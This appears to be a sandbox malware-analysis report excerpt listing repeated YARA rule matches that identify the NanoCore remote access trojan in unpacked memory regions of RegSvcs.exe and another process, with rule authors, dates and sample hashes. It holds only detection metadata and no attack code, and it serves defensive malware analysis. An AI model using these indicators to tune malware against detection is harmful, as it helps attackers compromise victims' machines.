      Source: 9.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 9.2.RegSvcs.exe.269d93c.15.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.269d93c.15.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.269d93c.15.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 9.2.RegSvcs.exe.5f0000.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.5f0000.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.37263cf.20.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.37263cf.20.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.39a632e.24.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.39a632e.24.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.4600000.29.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.4600000.29.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.37263cf.20.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.37263cf.20.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.399d4ff.25.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.399d4ff.25.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 9.2.RegSvcs.exe.b70000.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.b70000.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.3a1bc6e.26.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.3a1bc6e.26.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.3a2a09e.27.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.3a2a09e.27.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 9.2.RegSvcs.exe.590000.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.590000.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.5a0000.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.5a0000.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.3840482.23.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.3840482.23.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 9.2.RegSvcs.exe.382be55.21.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.382be55.21.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.d80000.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.d80000.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 9.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 9.2.RegSvcs.exe.48f4c9f.33.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.48f4c9f.33.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.381fc21.22.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.381fc21.22.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.2689300.16.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.2689300.16.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.4850000.31.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.4850000.31.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.3a1bc6e.26.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.3a1bc6e.26.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.399d4ff.25.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.399d4ff.25.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.399d4ff.25.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 9.2.RegSvcs.exe.3a12e3f.28.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.3a12e3f.28.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.267d0b8.14.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.267d0b8.14.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 4.2.plugmancdht5461.exe.36dbcc8.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 4.2.plugmancdht5461.exe.36dbcc8.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 4.2.plugmancdht5461.exe.36dbcc8.7.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 9.2.RegSvcs.exe.48f0000.32.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.48f0000.32.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 4.2.plugmancdht5461.exe.36a90a8.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 4.2.plugmancdht5461.exe.36a90a8.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 4.2.plugmancdht5461.exe.36a90a8.6.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 9.2.RegSvcs.exe.36547bd.18.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.36547bd.18.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
